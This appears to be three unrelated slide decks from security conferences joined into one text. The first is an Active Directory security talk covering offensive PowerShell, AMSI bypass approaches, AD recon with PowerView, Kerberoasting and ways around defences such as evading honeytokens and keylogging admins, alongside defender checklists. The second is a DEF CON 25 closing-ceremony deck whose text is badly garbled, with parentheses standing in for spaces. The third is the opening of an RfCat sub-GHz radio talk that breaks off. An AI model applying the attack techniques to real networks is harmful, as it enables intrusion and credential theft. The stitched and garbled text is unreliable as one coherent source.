Security Consultant / Researcher
Own & Operate ADSecurity.org
(Microsoft platform security info)
| @PryoTek3 | sean @ adsecurity.org |
Agenda
Key AD Security components
Offensive PowerShell
Bypassing PowerShell security
Effective AD Recon
AD Defenses & Bypasses
Security Pro’s Checklist
| @PryoTek3 | sean @ adsecurity.org |
Hacking the System
PS> Get-FullAccess
| @PryoTek3 | sean @ adsecurity.org |
| @PryoTek3 | sean @ adsecurity.org |
| @PryoTek3 | sean @ adsecurity.org |
| @PryoTek3 | sean @ adsecurity.org |
https://www.carbonblack.com/2016/03/25/threat-alert-powerware-new-ransomware-written-in-powershell-targets-organizations-via-microsoft-word/
| @PryoTek3 | sean @ adsecurity.org |
Differing Views of Active Directory
•Administrator
•Security Professional
•Attacker
Complete picture is not well understood by any single one of them
| @PryoTek3 | sean @ adsecurity.org |
AD Security in ~15 Minutes
| @PryoTek3 | sean @ adsecurity.org |
Forests & Domains
•Forest
•Single domain or collection of domains.
•Security boundary.
•Domain
•Replication & administrative policy
boundary.
| @PryoTek3 | sean @ adsecurity.org |
https://technet.microsoft.com/en-us/library/cc759073%28v=ws.10%29.aspx
| @PryoTek3 | sean @ adsecurity.org |
Trusts
• Connection between domains or forests to
extend authentication boundary (NTLM &
Kerberos v5).
• Exploit a trusted domain & jump the trust
to leverage access.
• Privilege escalation leveraging an exposed
trust password over Kerberos
(ADSecurity.org).
| @PryoTek3 | sean @ adsecurity.org |
Cloud Connectivity
•Corporate networks are connecting to
the cloud.
•Often extends corporate network into
cloud.
•Authentication support varies.
•Security posture often dependent on
cloud services.
| @PryoTek3 | sean @ adsecurity.org |
Sites & Subnets
• Map AD to physical locations for replication.
• Subnet-Site association for resource
discovery.
• Asset discovery:
• Domain Controllers
• Exchange Servers
• SCCM
• DFS shares
| @PryoTek3 | sean @ adsecurity.org |
Domain Controllers
•Member server -> DC via DCPromo
•FSMOs – single master roles.
•Global Catalog: forest-wide queries.
•Extraneous services = potential
compromise.
| @PryoTek3 | sean @ adsecurity.org |
Read-Only Domain Controllers
•Read-only DC, DNS, SYSVOL
•RODC Admin delegation to non DAs
•No passwords cached (default)
•KRBTGT cryptographically isolated
•RODC escalation via delegation
•msDS-AuthenticatedToAccountList
| @PryoTek3 | sean @ adsecurity.org |
DC Discovery (DNS)
| @PryoTek3 | sean @ adsecurity.org |
DC Discovery (ADSI)
| @PryoTek3 | sean @ adsecurity.org |
Group Policy
•User & computer management
•Create GPO & link to OU
•Comprised of:
• Group Policy Object (GPO) in AD
• Group Policy Template (GPT) files in
SYSVOL
• Group Policy Client Side Extensions on
clients
•Modify GPO or GPT…
| @PryoTek3 | sean @ adsecurity.org |
Group Policy Capability
•Configure security settings.
•Add local Administrators.
•Add update services.
•Deploy scheduled tasks.
•Install software.
•Run user logon/logoff scripts.
•Run computer startup/shutdown scripts.
| @PryoTek3 | sean @ adsecurity.org |
NTLM Authentication
| @PryoTek3 | sean @ adsecurity.org |
NTLM Authentication
• Most aren’t restricting NTLM auth.
• Still using NTLMv1!
• NTLM Attacks:
• SMB Relay - simulate SMB server or relay to
attacker system.
• Intranet HTTP NTLM auth – Relay to Rogue
Server
• NBNS/LLMNR – respond to NetBIOS broadcasts
• HTTP -> SMB NTLM Relay
• WPAD (network proxy)
• ZackAttack
• Pass the Hash (PtH)
| @PryoTek3 | sean @ adsecurity.org |
Kerberos Authentication
| @PryoTek3 | sean @ adsecurity.org |
Kerberos Key Points
• NTLM password hash for Kerberos RC4 encryption.
• Logon Ticket (TGT) provides user auth to DC.
• Kerberos policy only checked when TGT is created.
• DC validates user account when TGT > 20 mins.
• Service Ticket (TGS) PAC validation optional & rare.
• Server LSASS lsends PAC Validation request to
DC’s netlogon service (NRPC).
• If it runs as a service, PAC validation is optional
(disabled)
• If a service runs as System, it performs server
signature verification on the PAC (computer LTK).
| @PryoTek3 | sean @ adsecurity.org |
PowerShell
as an
Attack
Platform
| @PryoTek3 | sean @ adsecurity.org |
Quick PowerShell Attack History
• Summer 2010 - DEF CON 18: Dave Kennedy & Josh
Kelly “PowerShell OMFG!”
https://www.youtube.com/watch?v=JKlVONfD53w
• Describes many of the PowerShell attack techniques
used today (Bypass exec policy, -Enc, & IE).
• Released PowerDump to dump SAM database via
PowerShell.
• 2012 – PowerSploit, a GitHub repo started by
Matt Graeber, launched with Invoke-
Shellcode.
• “Inject shellcode into the process ID of your choosing or
within the context of the running PowerShell process.”
• 2013 - Invoke-Mimkatz released by Joe Bialek
which leverages Invoke-ReflectivePEInjection.
| @PryoTek3 | sean @ adsecurity.org |
PowerShell v5 Security Enhancements
•Script block logging
•System-wide transcripts (w/ invocation
header)
•Constrained PowerShell enforced with
AppLocker
•Antimalware Integration (Win 10)
http://blogs.msdn.com/b/powershell/archive/2015/06/09/powershell-the-blue-team.aspx
| @PryoTek3 | sean @ adsecurity.org |
| @PryoTek3 | sean @ adsecurity.org |
| @PryoTek3 | sean @ adsecurity.org |
| @PryoTek3 | sean @ adsecurity.org |
Windows 10: AntiMalware Scan Interface (AMSI)
| @PryoTek3 | sean @ adsecurity.org |
Bypassing Windows 10 AMSI
• DLL hijacking:
http://cn33liz.blogspot.nl/2016/05/bypassing-amsi-
using-powershell-5-dll.html
• Use Reflection:
| @PryoTek3 | sean @ adsecurity.org |
Metasploit PowerShell Module
| @PryoTek3 | sean @ adsecurity.org |
| @PryoTek3 | sean @ adsecurity.org |
PS Constrained Language Mode?
| @PryoTek3 | sean @ adsecurity.org |
PowerShell v5 Security Log Data?
| @PryoTek3 | sean @ adsecurity.org |
Effective AD Recon
Gaining better target knowledge than the Admins…
| @PryoTek3 | sean @ adsecurity.org |
PowerShell for AD Recon
•MS Active Directory PowerShell module
•Quest AD PowerShell module
•Custom ADSI PowerShell queries
•PowerView – Will Harmjoy (@harmj0y)
| @PryoTek3 | sean @ adsecurity.org |
Active Directory Forest Info
| @PryoTek3 | sean @ adsecurity.org |
Active Directory Domain Info
| @PryoTek3 | sean @ adsecurity.org |
Forest & Domain Trusts
| @PryoTek3 | sean @ adsecurity.org |
Digging for Gold in AD
•Default/Weak passwords
•Passwords stored in user attributes
•Sensitive data
•Incorrectly secured data
•Extension Attribute data
•Deleted Objects
| @PryoTek3 | sean @ adsecurity.org |
Discovering Data
•Invoke-UserHunter:
• User home directory servers & shares
• User profile path servers & shares
• Logon script paths
•Performs Get-NetSession against each.
•Discovering DFS shares
•Admin hunting… follow Will Harmjoy’s
work: blog.harmj0y.net
| @PryoTek3 | sean @ adsecurity.org |
Useful AD User Properties
• Created
• Modified
• CanonicalName
• Enabled
• Description
• LastLogonDate
• DisplayName
• AdminCount
• SIDHistory
• PasswordLastSet
• PasswordNeverExpires
• PasswordNotRequired
• PasswordExpired
• SmartcardLogonRequired
• AccountExpirationDate
• LastBadPasswordAttempt
• msExchHomeServerName
• CustomAttribute1 - 50
• ServicePrincipalName
| @PryoTek3 | sean @ adsecurity.org |
Useful AD Computer Properties
• Created
• Modified
• Enabled
• Description
• LastLogonDate
(Reboot)
• PrimaryGroupID
(516 = DC)
• PasswordLastSet
(Active/Inactive)
• CanonicalName
• OperatingSystem
• OperatingSystemServicePack
• OperatingSystemVersion
• ServicePrincipalName
• TrustedForDelegation
• TrustedToAuthForDelegation
| @PryoTek3 | sean @ adsecurity.org |
Fun with User Attributes: SID History
• SID History attribute supports migration
scenarios.
• Security principals have SIDs determine
permissions & resources access.
• Enables access for one account to effectively
be cloned to another.
• Works for SIDs in the same domain as well as
across domains in the same forest.
| @PryoTek3 | sean @ adsecurity.org |
DNS via LDAP
| @PryoTek3 | sean @ adsecurity.org |
Discover Computers & Services without
Port Scanning aka “SPN Scanning”
| @PryoTek3 | sean @ adsecurity.org |
Discover Enterprise Services without Port Scanning
• SQL servers, instances, ports, etc.
• MSSQLSvc/adsmsSQL01.adsecurity.org:1433
• RDP
• TERMSERV/adsmsEXCAS01.adsecurity.org
• WSMan/WinRM/PS Remoting
• WSMAN/adsmsEXCAS01.adsecurity.org
• Forefront Identity Manager
• FIMService/adsmsFIM01.adsecurity.org
• Exchange Client Access Servers
• exchangeMDB/adsmsEXCAS01.adsecurity.org
• Microsoft SCCM
• CmRcService/adsmsSCCM01.adsecurity.org
| @PryoTek3 | sean @ adsecurity.org |
SPN Scanning
SPN Directory:
http://adsecurity.org/?page_id=183
| @PryoTek3 | sean @ adsecurity.org |
Cracking Service Account Passwords
(Kerberoast)
Request/Save TGS service tickets & crack offline.
“Kerberoast” python-based TGS password cracker.
No elevated rights required.
No traffic sent to target.
https://github.com/nidem/kerberoast
| @PryoTek3 | sean @ adsecurity.org |
Discover Admin Accounts: Group Enumeration
| @PryoTek3 | sean @ adsecurity.org |
Discover Admin Accounts – RODC Groups
| @PryoTek3 | sean @ adsecurity.org |
Discover Admin Accounts –
AdminCount = 1
| @PryoTek3 | sean @ adsecurity.org |
Discover AD Groups with Local Admin Rights
| @PryoTek3 | sean @ adsecurity.org |
Discover AD Groups with Local
Admin Rights
| @PryoTek3 | sean @ adsecurity.org |
Attack of the Machines:
Computers with Admin Rights
| @PryoTek3 | sean @ adsecurity.org |
Discover Users with Admin Rights
| @PryoTek3 | sean @ adsecurity.org |
Discover Virtual Admins
| @PryoTek3 | sean @ adsecurity.org |
Follow the Delegation…
| @PryoTek3 | sean @ adsecurity.org |
Follow the Delegation…
| @PryoTek3 | sean @ adsecurity.org |
Discover Admin Accounts: Group Policy
Preferences
\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\
| @PryoTek3 | sean @ adsecurity.org |
Identify Partner Organizations via Contacts
| @PryoTek3 | sean @ adsecurity.org |
Identify Partner Organizations via Contacts
| @PryoTek3 | sean @ adsecurity.org |
Identify Domain Password Policies
| @PryoTek3 | sean @ adsecurity.org |
Identify Fine-Grained Password Policies
| @PryoTek3 | sean @ adsecurity.org |
Group Policy Discovery
| @PryoTek3 | sean @ adsecurity.org |
Identify AppLocker Whitelisting Settings
| @PryoTek3 | sean @ adsecurity.org |
Identify Microsoft EMET Configuration
| @PryoTek3 | sean @ adsecurity.org |
Identify Microsoft LAPS Delegation
| @PryoTek3 | sean @ adsecurity.org |
Identify Microsoft LAPS Delegation
| @PryoTek3 | sean @ adsecurity.org |
AD Defenses & Bypasses
| @PryoTek3 | sean @ adsecurity.org |
| @PryoTek3 | sean @ adsecurity.org |
HoneyTokens, HoneyCredentials…
•Credentials injected into memory.
•Deployment method?
•May or may not be real on the network.
•Validate account data with AD.
•Avoid these.
| @PryoTek3 | sean @ adsecurity.org |
Randomized Local Admin PW (LAPS)
•PowerUp to local admin rights.
•Dump service credentials.
•Leverage credentials to escalate
privileges.
•Find AD accounts with LAPS password
view rights.
•Find secondary admin account not
managed by LAPS.
| @PryoTek3 | sean @ adsecurity.org |
Network Segmentation
•“High Value Targets” isolated on the
network.
•Admin systems on separate segments.
•Find admin accounts for these systems &
where they logon.
•Compromise patching system to gain
access. (see PowerSCCM in PowerSploit).
| @PryoTek3 | sean @ adsecurity.org |
No Domain Admins
•Check domain “Administrators”
membership.
•Look for custom delegation:
•“Tier” or “Level”
•Workstation/Server Admins
•Somebody has rights!
| @PryoTek3 | sean @ adsecurity.org |
Privileged Admin Workstation (PAW)
• Active Directory Admins only logon to PAWs.
• Should have limited/secured communication.
• Should be in their own OU.
• May be in another forest (Red/Admin Forest).
• Compromise install media or patching system.
• Compromise in/out comms.
| @PryoTek3 | sean @ adsecurity.org |
Jump (Admin) Servers
• If Admins are not using Admin workstations,
keylog for creds on admin’s workstation.
• Discover all potential remoting services.
• RDP
• WMI
• WinRM/PowerShell Remoting
• PSExec
• NamedPipe
• Compromise a Jump Server, 0wn the
domain!
| @PryoTek3 | sean @ adsecurity.org |
AD Admin Tiers
| @PryoTek3 | sean @ adsecurity.org |
https://technet.microsoft.com/en-us/library/mt631193.aspx
AD Admin Tiers
| @PryoTek3 | sean @ adsecurity.org |
https://technet.microsoft.com/en-us/library/mt631193.aspx
ESAE Admin Forest (aka “Red Forest”)
| @PryoTek3 | sean @ adsecurity.org |
https://technet.microsoft.com/en-us/library/mt631193.aspx#ESAE_BM
ESAE Admin Forest (aka “Red Forest”)
• The “best” way to secure & protect AD.
• Separate forest with one-way forest trust.
• Separate smart card PKI system.
• Separate updating & patching system.
• All administration performed w/ ESAE
accounts & ESAE computers.
• Completely isolated.
| @PryoTek3 | sean @ adsecurity.org |
Universal Bypass for Most Defenses
•Service Accounts
•Over-permissioned
•Not protected like Admins
•Weak passwords
•No 2FA/MFA
•Limited visibility/understanding
| @PryoTek3 | sean @ adsecurity.org |
Interesting AD Facts
•All Authenticated Users have read
access to:
• Most (all) objects & their attributes in AD
(even across trusts!).
• Most (all) contents in the domain share
“SYSVOL” which can contain interesting
scripts & files.
| @PryoTek3 | sean @ adsecurity.org |
Interesting AD Facts:
•Standard user account…
• Elevated rights through “SID History”
without being a member of any
groups.
• Ability to modify users/groups without
elevated rights w/ custom OU ACLs.
• Modify rights to an OU or domain-
linked GPO, compromise domain.
| @PryoTek3 | sean @ adsecurity.org |
A Security Pro’s AD Checklist
• Identify who has AD admin rights (domain/forest).
• Identify DC logon rights.
• Identify virtual host admins (virtual DCs).
• Scan Active Directory Domains, OUs,
AdminSDHolder, & GPOs for inappropriate custom
permissions.
• Ensure AD admins protect their credentials by not
logging into untrusted systems (workstations).
• Limit service account rights that are currently DA (or
equivalent).
| @PryoTek3 | sean @ adsecurity.org |
PowerView AD Recon Cheat Sheet
• Get-NetForest
• Get-NetDomain
• Get-NetForestTrust
• Get-NetDomainTrust
• Invoke-MapDomainTrust
• Get-NetDomainController
• Get-DomainPolicy
• Get-NetGroup
• Get-NetGroupMember
• Get-NetGPO
• Get-NetGPOGroup
• Get-NetUser
• Invoke-ACLScanner
| @PryoTek3 | sean @ adsecurity.org |
Summary
•AD stores the history of an organization.
•Ask the right questions to know more
than the admins.
•Quickly recon AD in hours (or less)
•Business requirements subvert security.
•Identify proper leverage and apply.
| @PryoTek3 | sean @ adsecurity.org |
Questions?
Sean Metcalf (@Pyrotek3)
s e a n @ adsecurity . org
www.ADSecurity.org
Slides: Presentations.ADSecurity.org
| @PryoTek3 | sean @ adsecurity.org |
References
• PowerShell Empire
http://PowerShellEmpire.com
• Active Directory Reading Library
https://adsecurity.org/?page_id=41
• Read-Only Domain Controller (RODC) Information
https://adsecurity.org/?p=274
• DEF CON 18: Dave Kennedy & Josh Kelly “PowerShell OMFG!”
https://www.youtube.com/watch?v=JKlVONfD53w
• PowerShell v5 Security Enhancements
http://blogs.msdn.com/b/powershell/archive/2015/06/09/powershell-
the-blue-team.aspx
• Detecting Offensive PowerShell Attack Tools
https://adsecurity.org/?p=2604
• Active Directory Recon Without Admin Rights
https://adsecurity.org/?p=2535
| @PryoTek3 | sean @ adsecurity.org |
References
• Mining Active Directory Service Principal Names
http://adsecurity.org/?p=230
• SPN Directory:
http://adsecurity.org/?page_id=183
• PowerView GitHub Repo (PowerSploit)
https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
• Will Schroeder (@harmj0y): I have the PowerView (Offensive Active Directory
PowerShell) Presentation
http://www.slideshare.net/harmj0y/i-have-the-powerview
• MS14-068: Vulnerability in (Active Directory) Kerberos Could Allow Elevation of
Privilege
http://adsecurity.org/?tag=ms14068
• Microsoft Enhanced security patch KB2871997
http://adsecurity.org/?p=559
• Tim Medin’s DerbyCon 2014 presentation: “Attacking Microsoft Kerberos: Kicking
the Guard Dog of Hades”
https://www.youtube.com/watch?v=PUyhlN-E5MU
• Microsoft: Securing Privileged Access Reference Material
https://technet.microsoft.com/en-us/library/mt631193.aspx
• TechEd North America 2014 Presentation: TWC: Pass-the-Hash and Credential
Theft Mitigation Architectures (DCIM-B213) Speakers: Nicholas DiCola, Mark
Simos http://channel9.msdn.com/Events/TechEd/NorthAmerica/2014/DCIM-B213
| @PryoTek3 | sean @ adsecurity.org |
References
• Mimikatz
https://adsecurity.org/?page_id=1821
• Attack Methods for Gaining Domain Admin Rights in Active
Directory
https://adsecurity.org/?p=2362
• Microsoft Local Administrator Password Solution (LAPS)
https://adsecurity.org/?p=1790
• The Most Common Active Directory Security Issues and What
You Can Do to Fix Them
https://adsecurity.org/?p=1684
• How Attackers Dump Active Directory Database Credentials
https://adsecurity.org/?p=2398
• Sneaky Active Directory Persistence Tricks
https://adsecurity.org/?p=1929
| @PryoTek3 | sean @ adsecurity.org |
| @PryoTek3 | sean @ adsecurity.org |
Detecting/Mitigating PS>Attack
• Discover PowerShell in non-standard processes.
• Get-Process modules like
“*Management.Automation*”
| @PryoTek3 | sean @ adsecurity.org |
Detecting EXEs Hosting PowerShell
•Event 800: HostApplication not standard
Microsoft tool
•Event 800: Version mismatch between
HostVersion & EngineVersion (maybe).
•System.Management.Automation.dll hosted
in non-standard processes.
•EXEs can natively call .Net & Windows APIs
directly without PowerShell.
| @PryoTek3 | sean @ adsecurity.org | | pdf |
Closing(Ceremonies(
25th(Anniversary(
Badges'Badges'Badges!'
And…is(that(the(line(for(Swag?!(
#badgelife(
Swag!'
Sold(out(again!(
Thank(you(from(Swag(to(Speaker(Goons!(
(
Transparency'
• More(informaCon(
about(DEF(CON(
departments(and(
what’s(going(on.(
Thanks'to'all'DEF'CON'Goons'
• AdministraCon(
• A(&(E(
• Artwork(
• Badges(
• Contests/Events(
• Demo(Labs(
• Dispatch(
• DC(Groups(
• Forums(
•
Info/HackerTracker(
• Inhuman(Reg(
• OperaCons(
• NOC(/(DCTV(
• Press(
• ProducCon(
• QM(
• RegistraCon(
• Review(Board(
• SOC(
• Social(Media(
• Speaker(Ops(
• Swag(
• Vendors(
• Workshops(
Old'and'New'Goons'–'Thank'You!'
New,(reCring(Gold(Badge(Holders(
Gold(Badge(Holders(of(the(past(
New(Goons(–(n00ns(
Hacker'Tracker'App'
Android(and(iOS(
Source(available(on(GitHub(-(h[ps://goo.gl/bbVRMt(
Created(by(@shortstack(and(@sethlaw(
Developed(by(@ChrisMays94(@MaceraMeg(
Designed(by(@iMacHumphries(
Network'OperaBons'
Wired'Infrastructure'
–
Closed(CapConing(
–
Contests(
–
DC(TV(
–
Goons(
–
Media(Server(
–
Press(
–
Rootz(
–
Richard(Cheese(
–
SOMA(FM(
–
Speaker(Ops(
–
Speakers(
–
Vendors(
–
Villages(
–
WiFi(Monitoring(
Wireless'Infrastructure'
for(the(the(brave((and(
patched(devices)(
(
DC'TV'
for(those(people(in(their(
rooms(
(
The(Network(
•
10(gbps(backbone(
•
200(250(mbps(internet(uplink(
•
Wired(
–
Firewall(-(FreeBSD(
–
1(x(Core(Cisco(Switch((#yolo(,(but(we(had(a(cold(stand-by(box)(
–
14(x(Edge(Cisco(Switches(
–
3(x(Monitoring(”Servers”(
–
2(x(DC(TV(”Servers”(
–
1(x(WiFi(RegistraCon(”Server”(
–
1(x(Admin(”Server”(
–
Media(Server(
The(Network((cont)(
• Wireless(
– 7210(Aruba(Controller(
– 61(Aruba(Access(Points((70,(105,(135,(225)(
– 69(Aruba(Access(Points((model(305)(–(THANKS(Aruba!(
• DCTV(
– 13(ODROID(units(
– 2(x(on-site(streaming(servers(
– Video(Transcoding(provided(by(SOK(
The(Network((cont)(
DC(TV(
– HD(Broadcast(
– 2(Tracks(streamed(to(the(internetz(
– 5(channels(at(Caesars(
– 4(channels(for(each(remote(properCes(
Timeline(
Sunday'
NOC(Setup(
(
WiFi(APs(hanging/(
patching(
(
DC(TV(server(installs(
(
DC(TV(oDroids(
configuraCon(
(
dctv.defcon.org(up(
(
wifireg.defcon.org(up(
(
(
Tuesday'
Wednesday'
Site-Site(VPN(to(
Paris/Ballys(
(
Remote(oDroid(
Installs(
(
Network(
Management(
Systems(
Network(Monitoring(
(
Lots(of(walking(
(
APs(install(done(
(
patching((patching(
((
DC(TV(ready(to(go(
(not(all(hotel(towers/
properCes(though)(
(
(patching(patching(
mushroom(mushroom(
(
DONE!((record(for(the(
NOC,(but(then(last(
minute(requests)(
(
Decent(team(dinner(
Firewall(
(
Aruba(Controller((
(
MDF/IDF(connecCons(
(
Internet(UPLINK(
(
(
(
Monday'
Lots(of(Planning(
(
Less(planning(than(it(
should(have(been(
(
We(did(slightly(be[er(
on(planning(this(year(
(
Pre-staging(Wired(&(
Wireless(Gear(
Post-Con'2016/2017'
Timeline((cont)(
Friday'
DC(TV(stuffz(
Sunday'
Monday'
Teardown(
(
Start(Packing(
(
Beer(
Packing(
(
Leaving(Las(Vegas(
Just(worked((despite(
the(issues)(
Saturday'
Last(Minute(
Requests(
(new(
patches,(
cables,(
switches)(
Thursday'
Issues(
•
Bandwidth(
•
AP(Coverage(/(AP(Capacity(at(Cmes(
•
DC(TV(
– ODROIDS(
– Remote(LocaCon(Setup(
– Flood(at(Paris(
– switched(from(rtsp(to(rtmp(
WiFi(Stuff(
•
802.1x(misconcepCons(
•
Twi[er(trollage(
The(Usual(Stats(
• (4.886(TB(of(internet(traffic(
– Inbound:(3.688((compared(to(3.13487072983(from(DC24)(
– Outbound:(1.198((compared(to(1.1607473418(from(DC24)(
• 5,455(users(registered(on(wifireg((˜4k(last(year)(
• 2,104(wireless(users(peak((compared(to(1400)(
• 22k(unique(DHCP(leases((compared(to(35k,(thanks!)(
• 8,226(”unique”(mac(addresses(
• 6.74(TB(of(wireless(traffic(
• 1.89(TB(media(server(traffic(
effffn’s(twelve(
• Leads'
– effffn(
– mac(
• Infra/'Systems'
– #sparky((The(Machine)(
– booger(
– c0mmiebstrd(
– c7five(
– deadicaCon(
• DC'TV'
– videoman(
– serif(
• WiFi'
– CRV(
– Jon2(
• n00b'
– musa(
THANKS!(
•
DT(
•
Charel(
•
Will(
•
Ceasars(IT(Staff(
•
Encore(Staff(
•
Source(of(Knowledge(
•
The(nice(folks(who(always(bring(us(snacks!(
•
Press(Goons(
•
Capitan(Obvious(
•
Micah((for(nothing,(#1(Genius(Bar(Employee(<3)(
•
The(Machine(
•
YOU!(
h[p://defconnetworking.org(
@DEFCON_NOC(
noc\at/defconnetworking.org(
Fundraising'at'DEF'CON'
•
HFC($100((reverse(engineering(
challenge)(
•
EFF(-($95,000+(
•
With(small(donaCons(included(from:(
•
-(Beard(and(mustache(
•
-(Badge(hacking(
•
Darknet(-($3,900(for(EFF(
•
Rapid7(-($4,000(for(EFF(
•
Hack(fortress(-($159(for(EFF(
•
Mohawkcon:(
•
$5,100(donaCons:(
•
158(heads($4,600,(
•
Eff:($3,100(
•
HFC:($1,300(
•
SCcker(bot:($105((den(hac)(
•
Mohawk(swag:($500(
Villages'at'DEF'CON'
BioHacking'Village'
SE'Village'
Car'Hacking'Village'
Crypto'and'Privacy'Village'
Data'DuplicaBon'Village'
Hardware'Hacking'Village'(10th'Anniversary)'
ICS'Village'
IoT'Village'
Lockpick'Village'
Packet'Hacking'Village'
Recon'Village'
Tamper'Evident'Village'
Wireless'Village'
VoBng'Machine'Village'
Data'DuplicaBon'Village'
Sources'(6TB'each)(
•
Infocon.org(
•
Hashtables(
•
More(hashtables(
(
Drive'Types'
•
Seagate–(150((and(<6%(fail(
•
Western(Digital(–(147(<1%(fail(
•
Toshiba(–(109(<1%(
•
HGST(–(85(<18%((in(talks(w/them)(
•
Mediamax(–(7(<%43((huhwhat?)(
'
Output'(more'info'at'dcddv.org)(
•
Dupe(Cme(was:(
(7h50m(to(16h22m(per(drive(
(
•
Infocon( (
(
(229(copies(
•
Hashtables(1-2(
((95(copies(
•
Hashtable(2-2(((96(copies(
•
Total(dupes
(
(420(copies((lols)(
•
420(dupes(@(6TB(each(=(2.5(PB(Out!(
•
120MB/sec(Average(
•
95(duplicators(for(60(straight(hours(
Events'at'DEF'CON'
Friends'of'Bill'W.'
Be'the'Match''
Cycleoverride'DEF'CON'Ride'
DEAF'CON'
DEF'CON'Groups'ParBes'''
DEF'CON'Labs'
DEF'CON'Shoot'
Hacker'Jeopardy'
'
'
Hacker'Karaoke'
Ham'Radio'Exams'
Lawyer'Meetup'
Mohawk-Con'
Movie'Night'
Queercon'
SE'Podcast'Live'
Skytalks'
Contests'at'DEF'CON'
Contests'at'DEF'CON'
Beverage'Chilling'ContrapBon'Contest'
Bomb'DEFusing'
Capture'The'Flag'
Car'Hacking'CTF'
Capture'the'Packet'
CMD+CTRL'Hackathon'
Coindroids'
Counterfeit'Badge'Contest'
Crash'and'Compile'
CreaBve'WriBng:DEF'CON'Short'Story'Contest'
DEF'CON'Beard'and'Moustache'Contest'
DEF'CON'DarkNet'project'
DEF'CON'Scavenger'Hunt'
Drunk'Hacker'History'
'
'
Hack'Fortress'
Mission'SE'Impossible'
Packet'DetecBve'
Pocket'Protector'
Schemaverse'Championship'
SECTF'
SECTF4Kids'
Sheep'Hunt'
SOHOpelessly'Broken'
Tamper-Evident'Contest'
TD'Francis'X-Hour'Film'Contest'and'FesBval'
The'Box'(Bomb'Defusal'Contest)'
warl0ck'gam3z'
Whose'Slide'Is'It'
Wireless'CTF'
Black'Badge'Contests'at'DEF'CON'
Capture'The'Flag'
Car'Hacking'CTF'
Capture'the'Packet'
Crash'and'Compile'
DEF'CON'DarkNet'Project'
DEF'CON'Scavenger'Hunt'
Hack'Fortress'
SECTF'
SOHOpelessly''
Broken'
warl0ck'gam3z'
Wireless'CTF'
Social'Engineering'CTF'
Crypto'and'Privacy'Challenge'
SOHOpelessly'Broken'
Capture'the'Packet'
Telephreak'
Darknet'Project'
warl0ck'gam3z'
Wireless'CTF'
Carhacking'Village'CTF'
Crash'and'Compile'
Scavenger'Hunt'
OMG(20th(Anniversary(
Hack'Fortress'
Capture'the'Flag'
Thank'You'
LegiBmate'Business'Syndicate'
Five(incredible(years(
Five(amazing(operaCng(systems(
Nine(Bits(of(fun!(
Call'for'CTF'Organizers'
Opens(very(soon.(Stay(tuned.(
“Super'Secret”'Announcement'
See'You'Next'Year'at…'
• Caesar’s(Palace(in(2018(
• RegistraCon(for(Hotel(begins(on(Monday(
(
DEF(CON(26(is(August(9-12th( | pdf |
0x0000
“We are not as strong as we think we are”
● Rich Mullins
<GHz or bust!
leveraging the power of the
chipcon 1111
(and RFCAT)
0x1000 – intro to <GHz
●
FCC Rules(title 47) parts 15 and 18 allocate and govern parts of the
RF spectrum for unlicensed ISM in the US (US adaptation of the ITU-
R 5.138, 5.150, and 5.280 rules)
– Industrial – power grid stuff and more!
– Science – microwave ovens?
– Medical – insulin pumps and the like
●
US ISM bands:
– 300 : 300
– 433 : 433.050 – 434.790 MHz
– 915 : 902.000 – 928.000 MHz
– cc1111 does 300-348, 372-460, 779-928... but we've seen more.
●
Popular European ISM band:
– 868 : 863.000 – 870.000 MHz
●
Other ISM includes 2.4 GHz and 5.8 GHz
– cc2531.... hmmm... maybe another toy?
0x1010 – what is <GHz? what plays there?
●
Industry, Science, Medical bands, US and EU
●
Cell phones
●
Cordless Phones
●
Personal Two-Way Radios
●
Car Remotes
●
Pink IM-ME Girl Toys!
●
TI Chronos Watches
●
Medical Devices (particularly 401-402MHz, 402-405MHz, 405-406MHz)
●
Power Meters
●
custom-made devices
●
Old TV Broadcast
●
much, much more...
● cc1110/cc1111 do 300-348MHz, 391-464MHz, 782-928MHz
– and more...
● RFCAT uses the CC111x on some common dongles
– Chronos dongle (sold with every TI Chonos watch)
– “Don's Dongles”, aka TI CC1111EMK
– IMME (currently limited to sniffer/detection firmware)
● but there are some catches
– rf comms configuration?
– channel hopping sequence?
– bluetooth and DSSS? (not hap'nin)
0x1020 – how do we play with it?
0x1030 – why do i care!?
● the inner rf geek in all of us
● your security research may require that you consider
comms with a wireless device
● your organization may have 900MHz devices that
should be protected!
0x2000 – cc1111 summary SPEED READER!
● modified 8051 core
– 8-bit mcu
– single-tick instructions
– 256 bytes of iram
– 4kb of xram
– XDATA includes all code, iram, xram
– execution happens anywhere :)
● Full Speed USB
● RfCat hides most of these details by default!
0x2010 – cc1111 radio state engine
●IDLE
●CAL
●FSTXON
●RX
●TX
0x2020 – cc1111 radio configuration
● configuring the radio is done through updating a set of
1-byte registers in varying bit-size fields
– MDMCFG4 – MDMCFG0 – modem control
– PKTCTRL1, PKTCTRL0 – packet control
– FSCTRL1, FSCTRL0 – frequency synth control
– FREND1, FREND0 – front end control
– FREQ2, FREQ1, FREQ0 – base frequency
– MCSM1, MCSM0 – radio state machine
– SYNC1, SYNC0 – SYNC word, or the SFD
– CHANNR, ADDR – channel and address
– AGCCTRL2, AGCCTRL1, AGCCTRL0 – gain control
● RfCat hides most of these details by default!
0x2030 Smart RF Studio (ftw)
●
Data Rate, Bandwidth, and Intermediate Frequency and Freq-Deviation depend on each other
0x2100 – RfCat for devs
●
cc1111usb.c provides usb descriptors and framework
–
shouldn't need much tinkering
●
cc1111rf.c provides the core of the radio firmware
–
shouldn't need much tinkering
●
application.c provides the template for new apps
–
copy it and make your amazing toy
●
txdata(buffer, length) to send data IN to host
●
registerCbEP5OUT() to register a callback function to handle data
OUT from host
–
data is in ep5iobuf[]
●
transmit(*buf, length) allows you to send on the RF pipeline
●
appMainLoop() – modify this for handling RF packets, etc...
●
follow the examples, luke!
– RfCat's “application” source is appFHSSNIC.c
0x3000 – radio info we want to know
● frequencies
● modulation (2FSK/GFSK, MSK, ASK/OOK, other)
● intermediate frequency (IF)
● baud rate
● channel width/spacing/hopping?
● bandwidth filter
● sync words / bit-sync
● variable length/fixed length packets
● crc
● data whitening?
● any encoding (manchester, fec, enc, etc...)
0x3010 – interesting frequencies
● 315MHz – car fobs
● 433MHz – medical devices, garage door openers
● 868MHz – EU loves this range
● 915MHz – NA stuff of all sorts (power meters, insulin
pumps, industrial plant equipment, industrial backhaul)
● 2.4GHz – 802.11/wifi, 802.15.4/zigbee/6lowpan, bluetooth
● 5.8GHz – cordless phones
● FREQ2, FREQ1, FREQ0
0x3020 – modulations
● 2FSK/GFSK – Frequency Shift Key
